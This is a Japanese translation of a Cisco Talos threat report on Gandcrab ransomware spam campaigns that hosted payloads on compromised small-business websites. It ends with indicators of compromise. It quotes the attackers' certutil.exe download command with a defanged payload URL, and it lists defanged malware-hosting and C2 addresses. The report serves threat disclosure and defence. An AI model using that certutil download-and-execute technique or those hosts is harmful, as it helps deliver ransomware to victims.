最近では脅威環境におけるランサムウェアの拡散度が低下していますが、Cisco Talos では、現在広く配布されている「Gandcrab」と呼ばれるランサムウェアをモニタリングしています。Gandcrab は、従来のスパム キャンペーンと、Rig や Grandsoft などの複数のエクスプロイト キットの両方を利用しています。脅威環境で最も利用されているマルウェアとしては、暗号通貨マイナーがランサムウェアに追い付きつつありますが、ランサムウェアが引き続き有効な攻撃手法となることを Gandcrab が証明しています。
Talos では、最近のスパム キャンペーンを調査する中で、Gandcrab の配布に利用されている一連の感染サイトを発見しました。マルウェアの配布を停止することが難しい理由を示す事例は数多くありますが、Gandcrab はその最新事例であり、Web サイトの保護が困難かつ必要なタスクであることを示しています。こうした問題の解決が非常に難しいことがはっきりと分かる事例を紹介しましょう。ある Web サイトが、一時的に閉鎖されていたにもかかわらず、わずか数日間で 2 度も Gandcrab に利用されていたことが確認されたのです。
最初のキャンペーン
2018 年 4 月 30 日以降、オンライン注文を装った大規模なスパム キャンペーンが確認されました。このキャンペーンでは、「Your Order #{ランダムな数字}」(例:Your Order #99627)という件名が使われました。メールのサンプルは以下のとおりです。
上の画像のとおり、本文には記載事項がほとんどなく、ZIP ファイルが添付されています。この ZIP ファイルには Word 文書が含まれており、Gandcrab ランサムウェアをダウンロードして実行するマクロが組み込まれていました。この特定のインスタンスでは、マルウェアは以下のパスからダウンロードされていました。
hxxp://185.189.58[.]222/bam.exe
キャンペーンにおいては、ZIP ファイルの代わりに VBScript ファイルが添付されているメールも確認されました。結果は ZIP ファイルの場合と同じで、ペイロードがサーバからダウンロードされていました。このマルウェアの興味深い点は、ペイロードをダウンロードするために使われているシステム ツールです。マクロを使ってペイロードをダウンロードする手法は数多くありますが、このキャンペーンでは、certutil.exe を活用するという少し斬新なアプローチが使われていました。Certutil.exe は、証明書サービスの一部としてインストールされるコマンド ライン ユーティリティです。キャンペーンでは、悪意のあるペイロードをダウンロードするために活用されました。実際に使われたシンタックスは以下のとおりです。
certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe
「-urlcache」というフラグは、URL をキャッシュしたエントリの表示や削除に使用するためのものです。しかし、「-f」や「-split」といったフラグを活用することで、上記の場所に URL をダウンロードさせることができます。この技術は、攻撃者によって定期的に使われているものですが、一般的なものではありません。その後、ファイルが実行されると、Gandcrab がターゲット システムにインストールされます。
同じキャンペーンが別の場所で発生
最初のキャンペーンが押し寄せてから数日後、2 つ目のキャンペーンが開始されました。5 月 2 日以降、ほぼ同一のキャンペーンを利用したメールの波状攻撃が新たに確認されました。件名、本文、添付ファイルは、最初のものとほぼ同じでした。わずかな違いとして、ペイロードがホストされた場所が異なっていました。当初、マルウェアを取得する GET リクエストが以下のとおりだったことから、ランダムなホストと見られていました。
hxxp://172.104.40[.]92/js/kukul.exe
しかし、調査をさらに進め、DNS を確認したところ、実際には実在する正当な Web サイト(www[.]pushpakcourier[.]net)であることが分かりました。また、hxxp://www[.]pushpakcourier[.]net/js/kukul.exe からペイロードをダウンロードできたことで、その事実を確認することができました。Web サイト自体は、インドを拠点とする宅配業者のものでした。
Web サイトが phpMyAdmin を実行していることは、すぐに特定できました。どのような脆弱性があるか、もう少し詳しく見ていったところ、デフォルトのクレデンシャル情報や複数の MySQL の脆弱性など、悪用可能な大量の脆弱性が発見されました。この発見からまもなく、Web サイトは削除されました。Talos では、脅威の発生元とダウンロードの範囲を特定できるよう、サイトオーナーに直接連絡することも試みました。
このインシデントによって、私たちが直面する最大の課題の 1 つが明らかになりました。感染した Web サイトです。インターネットには膨大な数の Web ページが存在しており、その多くが時代遅れのソフトウェア上で動作しています。ほとんどのスモール ビジネスは、Web フレームワークに対する新たな脆弱性がリリースされていることを認識していません。たとえ認識していたとしても、自社の Web サイトが利用しているソフトウェアを、頻繁に更新するための専門知識や時間が不足しています。
一方、敵対者はこうした脆弱性をすぐに活用することができるため、インターネットを広範に調べ、犠牲となる候補を探し始めます。この種のスパム キャンペーンにおいて、感染サイトを活用することはますます効果的になっています。なぜなら敵対者にとって、永続性を維持する必要がなく、システムを感染させるためのファイルを特定の場所にコピーするだけで済むからです。
後日、もっと怠惰なスパム送信者が登場
最初の 2 つのキャンペーンからまもなく、3 つ目のキャンペーンが確認されました。今回も、基本的な件名、本文、添付ファイルは同じ内容でした。ただし、今回のキャンペーンでは IP は使用されず、似たような感染サイトからドメインを使ってマルウェアがダウンロードされていました。
hxxp://herbal-treatment-advisory[.]com/c.exe
この感染サイトは、きわめて多くの悪用可能な脆弱性を有する WordPress で作成されたサイトのようでした。もう少し詳しく見ていくと、1 年以上も古いバージョンの WordPress を使用していることが明らかになりました。さらに、この感染サイトは、過去にも Gandcrab に利用されていたことが分かりました。これもまた、1 度感染してしまったサイトは、継続的にマルウェアの配布に利用されてしまうことを示す事例です。敵対者は時間と費用を節約でき、ドメインを登録したり、VPS を購入したり、ファイルをホストするよう Web サーバを設定することができるようになります。加えて、感染させたサイトの Web レピュテーションを活用できるというメリットもあります。少なくとも最初の段階では、ブラックリスト技術をバイパスできる可能性があるからです。
いずれのケースでも、Web サイトには古いバージョンのソフトウェアが使われており、使用している Web フレームワークの管理ページが一般に公開された状態になっていました。小規模な企業のサイトを開設する際に、Web サイト管理者がやってしまいがちなミスです。敵対者がサイトへのアクセスを獲得してマルウェアに利用する事態を防ぐには、管理ページが保護されており、ソフトウェアがパッチ済みである状態を確保することが最優先となります。
同じサイトで異なるキャンペーンが発生
5 月 5 日と 7 日には、再び同じテンプレートを使用したスパム キャンペーンが開始されたことが、新たに確認されました。今回のスパム送信者は、キャンペーンの独自性にはあまり労力を割いていません。数日間にわたり、様々な場所にマルウェアをホストした同じような基本形のメールが、繰り返し確認されました。利用された Web サイトが新規のものではない点を除けば、今回のキャンペーンも、決して例外的なものではありませんでした。以下に示すとおり、敵対者は数日前に利用した同じサイトに戻ってきたのです。対象の Web サイトが、おそらくマルウェアをホストしていたことが原因で削除されたにもかかわらず、再び利用されました。
hxxp://pushpakcourier[.]net/css/c.exe
hxxp://herbal-treatment-advisory[.]com/c.exe
1 週間にわたり、4 つの異なるスパム キャンペーンが感染サイトを活用していました。また、一部のケースでは、クリーニングを試みたにもかかわらず、以前と同じサイトが使われたことが確認されました。このことは、スモール ビジネスが自社の Web サイトをサポートする際に直面する課題を明白に示しています。敵対者は、脆弱性と公開された管理ページの両方をすばやく特定し、世界中にマルウェアを配布するために活用するのです。
ペイロード
Gandcrab は、現在、最も広く配布されているランサムウェアの亜種の 1 つです。ほぼ恒常的に開発されており、作成者は新しいバージョンを精力的なペースでリリースしています。基本的な機能は、すでに文書化されています。「.CRAB」という拡張子を付けてファイルを暗号化したり、ユーザのバックグラウンドを変更したり、通信に Tor を活用したりするなど、ランサムウェアに典型的な動作をします。
Gandcrab の興味深い要素の 1 つは、コマンド アンド コントロール(C2)通信にネームコイン ドメインを使用する点です。このドメインは、「.bit」というトップ レベル ドメイン(TLD)で簡単に識別できます。敵対者が識別を回避するために、Tor とネームコイン ドメインを利用する傾向が増加しています。ネームコインは、ピアツーピア ネットワークを利用するのではなく、中央権限に依存しない形の分散型 DNS サービスです。そのため、ドメインの閉鎖や、黒幕と考えられる攻撃者の特定がますます難しくなっています。
ネームコイン ドメインの事例は、DNS を企業環境内に閉じ込めるべきだということを示しています。ネームコインは、信頼性のある応答を返すのにブロックチェーンを利用するため、通常、標準の DNS サーバが .bit ドメインに利用されることはありません。企業が、DNS サーバに対する未承認アクセスをすべてブロックしている場合、ほとんどの .bit ドメインもブロックされます。すでに、.bit TLD 向けに、tor2web と同様のプロキシ サービスが出現しているのを確認しています。
まとめ
ランサムウェアによる被害が 10 億ドルに達する中、Gandcrab のような脅威は今後も繰り返し出現するでしょう。何百万という Web ページが、何千もの脆弱性を有するプラットフォーム上に存在しています。こうした Web ページのほとんどが、新たな脆弱性に対処するための専門知識やリソースを持たない小規模な組織によって作成、維持されており、今後しばらくの間は引き続き問題となるでしょう。敵対者がマルウェアを正当なサイトに隠せる限り、Web レピュテーション システムの感染は防げないでしょう。
Gandcrab の事例から分かることは、暗号通貨マイナーの人気が高まっているとしても、ランサムウェアが消えることはないということです。敵対者は常に、金儲けできる機会を探しています。その手法がランサムウェアか悪意のある暗号通貨マイナーかにかかわらず、手っ取り早く金を稼ごうとしているのです。感染した Web サイトがマルウェア配布に活用されているということが、セキュリティ コミュニティが直面している最大の課題の 1 つです。
カバレッジ
お客様がこの脅威を検出してブロックできる別の方法を以下に記載します。
Advanced Malware Protection(AMP)は、これらの攻撃者によるマルウェアの実行の阻止に最適です。
CWS や WSA の Web スキャンは、悪意のある Web サイトへのアクセスを阻止し、それらの攻撃に使用されたマルウェアを検出します。
E メール セキュリティは、攻撃の一環として攻撃者が送りつける不正なE メールをブロックします。
NGFW や NGIPS、および Meraki MX などのネットワーク セキュリティ アプライアンスで、この脅威に関連付けられた悪意のあるアクティビティを検出できます。
AMP Threat Grid は、悪意のあるバイナリを特定し、すべてのシスコ セキュリティ製品に保護機能を組み込みます。
シスコのセキュア インターネット ゲートウェイ(SIG)であるUmbrellaは、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。
オープンソース Snort サブスクライバ ルール セットをお使いであれば、Snort.org で購入可能な最新のルール パックをダウンロードすることで、システムを最新状態に維持できます。
IOC
メールの件名:
Your Order #{ランダムな数字}
Gandcrab のハッシュ値:
6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501
692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08
ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c
3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e
521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d
9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6
27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad
ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706
0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5
07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257
0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e
812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0
d25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a
ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55
C2 ドメイン:
zonealarm[.]bit
Ransomware[.]bit
gandcrab[.]bit
Carder[.]bit
感染したドメイン:
Herbal-treatment-advisory[.]com
pushpakcourier[.]net
本稿は 2018年5月9日に Talos Group のブログに投稿された「Gandcrab Ransomware Walks its Way onto Compromised Sites」の抄訳です。